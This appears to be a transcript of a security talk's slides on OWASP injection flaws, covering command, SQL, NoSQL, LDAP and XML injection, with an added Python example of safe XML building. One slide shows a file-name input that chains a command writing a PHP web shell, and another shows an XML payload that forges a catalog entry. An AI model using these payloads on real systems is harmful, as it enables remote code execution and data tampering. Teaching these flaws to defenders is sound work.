OWASP A1 - Injection | The art of manipulation
Transcript of OWASP A1 - Injection | The art of manipulation
Page 1
OWASP A1 – Injection: The art of manipulation
pavanw3b
Page 2
$ whoami
• Pavan aka pavanw3b
• Security Engineer at
• Null Hyd Core
• Love hunting bugs
• Got lucky with
• www.pavanw3b.com
Page 3
Injections – the worst ever!
• Mar '08 – Heartland Payment Systems – 134m credit cards exposed
• Oct '13 – $100,000 stolen from a California ISP
• 2007–2012 – a group of hackers stole $300m from 10+ companies
• 2014 – Shellshock: Remote Code Execution
• 2015 – Microsoft RDP Remote Code Execution
...and many, many others.
Page 4
Good vs Bad
• Corporate Pentester: given one week and asked to find all the vulnerabilities.
• Attacker: takes as much time as needed to find any one vulnerability to get in.
Page 5
When data becomes commands
Criminal Registration Form
Applicant Name: "Vayu, you are free to go!"
The officer reads the applicant's name off the form: "Vayu, you are free to go!"
data = commands
Page 6
The dumb server
What file do you want to delete?
?file_name=my_message.txt; echo '<?php system($_GET["cmd"]); ?>' > shell.php
Page 7
Types of Injection
1. Command Injection
2. Database Injection
   o SQL
   o NoSQL
3. LDAP
4. XML Injection
Page 8
1. Remote Code Execution
• User-controlled data goes into part of a system command.
• Post-exploitation: privilege escalation.
• Backdoor.
Page 9
2.1 SQL Injection
• Perform (any) unauthorized database transaction.
• Dump, drop, alter and many more.
• Backdoor.
Page 10
2.2 NoSQL – No Injection?
Page 11
3. LDAP Injection
Try ( | & * and other special chars to see errors.
Page 12
4. XML Injection
• Attribute, Value, CDATA
• XXE, XSLT, XPath

Original document:
<catalog>
  <book id="101">
    <author>Pavan</author>
    <title>Dark w3b</title>
    <price>INR 200</price>
  </book>
</catalog>

Payload (injected into the id attribute):
102"><author>vayu</author><title>A treat</title><price>FREE</price></book><book id="

Result:
<catalog>
  <book id="102">
    <author>vayu</author>
    <title>A treat</title>
    <price>FREE</price>
  </book>
  <book id="101">
    <author>Pavan</author>
    <title>Dark w3b</title>
    <price>INR 200</price>
  </book>
</catalog>
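The slide's payload, as an added example that is not part of the deck: spliced into a string-built catalog it rewrites the structure into two books, while a catalog built with Python's ElementTree escapes the value so a consumer parses exactly one book whose id is just an odd string. The digits-only id check is my assumption, not something the slides describe.

```python
import xml.etree.ElementTree as ET

# Payload from the XML Injection slide, reproduced verbatim as the book-id input.
SLIDE_PAYLOAD = ('102"><author>vayu</author><title>A treat</title>'
                 '<price>FREE</price></book><book id="')


def build_catalog_unsafe(book_id: str) -> str:
    """String-built XML: the id value is spliced into the markup untouched,
    so a value containing quotes and tags rewrites the document structure."""
    return ('<catalog><book id="' + book_id + '"><author>Pavan</author>'
            '<title>Dark w3b</title><price>INR 200</price></book></catalog>')


def build_catalog_safe(book_id: str) -> str:
    """Library-built XML: ElementTree escapes <, >, & and quotes inside the
    attribute, so the id stays a single (odd-looking) string value."""
    catalog = ET.Element("catalog")
    book = ET.SubElement(catalog, "book", id=book_id)
    ET.SubElement(book, "author").text = "Pavan"
    ET.SubElement(book, "title").text = "Dark w3b"
    ET.SubElement(book, "price").text = "INR 200"
    return ET.tostring(catalog, encoding="unicode")


def is_valid_book_id(book_id: str) -> bool:
    """Input-side allowlist (my assumption, not from the deck): ids are digits only.
    Escaping on output is the real fix; this just rejects junk early."""
    return book_id.isdigit()


def list_books(xml_text: str) -> list:
    """Parse the catalog the way a consumer would; return (id, author) per book."""
    root = ET.fromstring(xml_text)
    return [(book.get("id"), book.findtext("author")) for book in root.findall("book")]


if __name__ == "__main__":
    print(list_books(build_catalog_unsafe(SLIDE_PAYLOAD)))  # two books, vayu first
    print(list_books(build_catalog_safe(SLIDE_PAYLOAD)))    # one book, id == payload
```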
Page 13
Some Credits
• https://www.owasp.org
• http://www.slideshare.net/m1ke/owasp-a1-injection
• Rahul Sasi: http://www.slideshare.net/_c0c0n_/webapp-remote-code-execution-via-scripting-engines
• Amol Naik: http://www.slideshare.net/AMolNAik3/xml-xpath-injections
• The Hacker News
• CIO
Page 14
Questions?
Will be answered in the humla session.
Thanks
/pavanw3b